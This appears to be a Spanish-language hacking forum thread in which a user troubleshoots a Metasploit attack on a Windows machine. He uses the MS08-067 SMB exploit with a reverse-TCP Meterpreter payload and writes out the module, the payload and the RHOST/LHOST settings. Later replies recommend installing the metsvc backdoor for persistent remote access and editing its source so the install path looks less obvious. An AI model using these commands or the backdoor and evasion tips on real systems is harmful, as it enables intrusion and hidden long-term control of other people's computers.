Título: Ayuda con MSF Publicado por: CloudswX en 13 Febrero 2010, 23:45 pm Duda Metasploit.
Ok gente sere breve en mi duda: Escaneo una IP con el Nmap.... Código: PORT STATE SERVICE VERSION Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y.... Citar msf> use windows/smb/ms08_067_netapi Luego de esto elijo el PAYLOAD: Código: msf> use PAYLOAD windows/meterpreter/reverse_tcp Introduzco todas las variables con el comando "set"... Código: set RHOST 200.xx.xx.xx y finalmente Código: msf> exploit El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error: http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink (http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink) Sera porque el host se queda con la sesion anterior del Meterpreter? Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez :-\ Post data estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india. Título: Re: Ayuda con MSF Publicado por: Shell Root en 14 Febrero 2010, 00:09 am Tip para el MSF: Cuando consigues la session del Meterpreter, pulsando Ctrl + Z la pones a trabajar en segundo plano, despues si quieres volver a la session, bastará con correr el comando sessions -l, ver el ID de la session y despues para interactual con ella, ejecutas, sessions -i ID_Session.
Ahora con la duda que planteas, no entendí, porque no estas usando la misma IP? Como te sales de la consola del meterpreter? Título: Re: Ayuda con MSF Publicado por: [L]ord [R]NA en 15 Febrero 2010, 14:27 pm Duda Metasploit. Ok gente sere breve en mi duda: Escaneo una IP con el Nmap.... Código: PORT STATE SERVICE VERSION Tiene el puerto 445 abierto (vulnerabilidad en el SMB), luego abro mi consola de MSF y.... Citar msf> use windows/smb/ms08_067_netapi Luego de esto elijo el PAYLOAD: Código: msf> use PAYLOAD windows/meterpreter/reverse_tcp Introduzco todas las variables con el comando "set"... Código: set RHOST 200.xx.xx.xx y finalmente Código: msf> exploit El asunto esta en que consigo mi sesion con el meterpreter sin problema alguno, pero cuando salgo de la consola del meterpreter y posteriormente del MSF, no puedo volver a conectar con el host pues da el siguiente error: http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink (http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink) Sera porque el host se queda con la sesion anterior del Meterpreter? Y si es asi, como consigo que no me siga pasando pues la cosa esta que solo consigo entrar a la pc victima una sola vez :-\ Post data estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india. Incluso el exploit funcionando no obtendras una sesion, en LHOST estas poniendo una IP privada mientras que con RHOST estas atacando una IP Publica (200.xxx.xxx.xxx), si funciona el exploit en ese ordenador tratara de hacer una conexion contra la ip 192.168.xxx.xxx de su red privada si esa direccion existe, de lo contrario no hara nada. Título: Re: Ayuda con MSF Publicado por: CloudswX en 15 Febrero 2010, 14:54 pm Pollo... Si te fijas en la imagen que esta en el link
NO ESTOY ATACANDO UNA IP PUBLICA Post data estas pruebas las hago en mi casa pues tengo varias pc´s que uso como conejillos de india. Es decir tengo una red LAN, donde uso Ip's privadas... Si lo dices por esto: set RHOST 200.xx.xx.xx set LHOST 192.168.x.xx set RPORT 445 set LPORT 4444 set TARGET 0 Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales. Mira esta imagen para que las veas: http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink (http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink) Título: Re: Ayuda con MSF Publicado por: ruben_linux en 18 Febrero 2011, 23:45 pm a mi parecer son son pocas las redes que caen en en este exploit.
esta anticuado, cualquier red del 2011 ya no tiene ese fallo :-) Título: Re: Ayuda con MSF Publicado por: Debci en 19 Febrero 2011, 11:10 am Pollo... Si te fijas en la imagen que esta en el link Fuese como fuese, pusiste IP privada y no puedes menospreciar a otros que han intentado ayudarte, ilustrando un posible problema, tal como lo has planteado.NO ESTOY ATACANDO UNA IP PUBLICA Es decir tengo una red LAN, donde uso Ip's privadas... Si lo dices por esto: set RHOST 200.xx.xx.xx set LHOST 192.168.x.xx set RPORT 445 set LPORT 4444 set TARGET 0 Solo lo hice para ilustrar un poco que el error no estaba en una variable pendeiente de SETEAR. No son las Ip's reales. Mira esta imagen para que las veas: http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink (http://picasaweb.google.com/lh/photo/i0Ya_l659UiyRlKj92MIAA?feat=directlink) Saludos Título: Re: Ayuda con MSF Publicado por: CloudswX en 21 Marzo 2011, 02:01 am nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion..
Título: Re: Ayuda con MSF Publicado por: Debci en 22 Marzo 2011, 18:14 pm nunca menospreciare toda la ayuda que aqui he recibido, no ha sido esa mi intencion.. Bueno, mirate algo acerda del METSVC si aún sigues interesado, para maneter una session persistencte a pesar de que reinicie el equipo, te salgas y tal.Backdoreando el equipo remoto (http://www.metasploit-es.com.ar/wiki/index.php/Servicio_de_Meterpreter_%22Backdoor%22) Y conectandonos al backdoor tras su instalación (http://www.metasploit-es.com.ar/wiki/index.php/Interactuar_con_Metsvc) en el equipo remoto. Saludos Título: Re: Ayuda con MSF Publicado por: CloudswX en 22 Marzo 2011, 19:49 pm Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos.
y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc es esto: Código: [*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh... ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO :huh: Título: Re: Ayuda con MSF Publicado por: Debci en 22 Marzo 2011, 21:58 pm Pues la verdad me parece muy util el BT de "metsvc" ya que como dices es un poco tedioso explotar la misma vulnerabilidad cada vez que queramos una shell remota. Pero el asunto de que cualquier otra persona con acceso al puerto podria utilizar mi backdoor es un factor a tomar en cuenta para los que hacemos pentest entre amigos. Mmm fíjate en los archivos source .rb de METSVC y fíjate si puede cambiar en alguna la ruta (haz una backup siempre por si acaso).y algo que me llamo la atencion y no se si se pueda modificar con las opciones dadas por 'çmetsvc es esto: Código: [*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh... ya que este crea un directorio llamado VICTIM ? NO SERA MUY OBVIO :huh: Saludos Título: Re: Ayuda con MSF Publicado por: CloudswX en 22 Marzo 2011, 22:17 pm esta noche me pondre a trabajar en ello a ver que hago.. te dejare saber...
|